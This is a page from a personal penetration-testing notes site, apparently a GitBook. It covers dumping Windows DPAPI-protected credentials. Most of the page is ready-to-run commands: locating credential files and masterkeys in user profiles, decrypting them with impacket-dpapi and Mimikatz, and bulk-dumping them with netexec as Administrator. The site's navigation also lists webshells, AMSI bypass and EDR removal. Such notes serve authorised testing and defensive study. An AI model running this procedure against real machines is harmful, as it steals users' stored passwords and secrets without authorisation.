yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • From Low Users
  • Manual Approach
  • Mimikatz
  • From Administrator
  • Other tools

Was this helpful?

  1. Active Directory
  2. Credential Hunting

DPAPI

Credentials Dumping from Data Protection API

From Low Users

Manual Approach

Locating credential files:

dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\

Locating masterkeys:

dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\

Usually, the structure is like this:

C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID

Download all credential files and masterkeys to attacker machine. And then extract the credentials using impacket-dpapi.

Decrypt masterkey

impacket-dpapi masterkey -file $masterkey -sid $SID -password Password1213!

Or if you have the backup key:

impacket-dpapi masterkey -file $masterkey -sid $SID -pvk key.pvk

Grab credentials:

impacket-dpapi credential -file $credsfile -key $decryptedkey

Mimikatz

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\$SID\$GID /sid:$SID /password:Password1337 /protected" "exit"'
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\$credsfile /masterkey:$decryptedkey"'

From Administrator

netexec smb target.local -u Administrator -p Password123 --local-auth --dpapi

Other tools

PreviousGroup Policy PreferencesNextDefense Evasion

Last updated 6 months ago

Was this helpful?

🪟
DonPAPI
dploot
SharpDPAPI